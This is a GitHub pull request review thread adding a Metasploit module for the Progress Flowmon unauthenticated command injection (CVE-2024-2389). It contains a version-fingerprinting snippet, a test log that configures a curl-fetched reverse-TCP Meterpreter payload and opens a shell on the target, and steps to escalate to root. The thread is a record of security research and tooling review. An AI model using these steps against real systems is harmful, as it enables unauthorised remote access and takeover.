Add module for Flowmon cmd injection CVE-2024-2389 #19150
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DaveYesland
changed the title
adfoster-r7
reviewed
May 2, 2024
documentation/modules/exploit/linux/http/progress_flowmon_unauth_cmd_injection.md
Outdated
Show resolved
Hide resolved
adfoster-r7
reviewed
May 2, 2024
modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
Outdated
Show resolved
Hide resolved
adfoster-r7
reviewed
May 2, 2024
| end | ||
|
|
||
| # Use a regular expression to extract the version number from the response | ||
| version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)}) |
There was a problem hiding this comment.
Not a blocker: As a sanity question; is fingerprinting on homepage/auth/login and having fav.ico?v=.... enough to uniquely identify the application as flowmon - or are there other checks we can add to have a more rigorous check
There was a problem hiding this comment.
I've added a check to ensure the following html appears on the login page:
<title>Flowmon Web Interface</title>
adfoster-r7
reviewed
May 2, 2024
modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
Outdated
Show resolved
Hide resolved
7 tasks
jvoisin
reviewed
May 2, 2024
modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
Outdated
Show resolved
Hide resolved
jheysel-r7
reviewed
May 23, 2024
There was a problem hiding this comment.
Thanks for the awesome module @DaveYesland. I pushed up a059700, hope you don't mind. I responded to the outstanding comments on the PR made a couple minor fixes. The PR is looking great and testing was as expected 👍
msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > options
Module options (exploit/linux/http/progress_flowmon_unauth_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.2.26 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/u
sing-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI path to Flowmon
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME kCCuPRnPS no Name to use on remote system when storing payload; cannot contain spaces
or slashes
FETCH_SRVHOST 192.168.2.23 no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces
LHOST 192.168.2.23 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > run
[*] Started reverse TCP handler on 192.168.2.23:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.2.26:443 can be exploited!
[*] Detected version: 12.03.02
[+] Version 12.03.02 is vulnerable.
[+] The target is vulnerable.
[*] Attempting to execute payload...
[*] Meterpreter session 1 opened (192.168.2.23:4444 -> 192.168.2.26:34294) at 2024-05-23 13:12:55 -0400
meterpreter > getuid
Server username: flowmon
meterpreter > sysinfo
Computer : localhost.localdomain.localdomain
OS : CentOS 7.9.2009 (Linux 3.10.0-1160.102.1.el7.flowmon.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
| end | ||
|
|
||
| # Use a regular expression to extract the version number from the response | ||
| version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)}) |
There was a problem hiding this comment.
I've added a check to ensure the following html appears on the login page:
<title>Flowmon Web Interface</title>
jheysel-r7
added
module
docs
rn-modules
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This adds a module for:
CVE-2024-2389: Progress Flowmon Unauthenticated Command Injection
For more details on the vulnerability:
https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
This application is avaiable in cloud marketplaces:
Verification Steps
use exploits/linux/http/progress_flowmon_unauth_cmd_injectionset RHOSTS <target flowmon>set RPORT <port flowmon is running on>set LHOST <your host IP>runflowmonuser.exploit/linux/local/progress_flowmon_sudo_privesc_2024to gain root privileges.Scenarios
Flowmon 12.2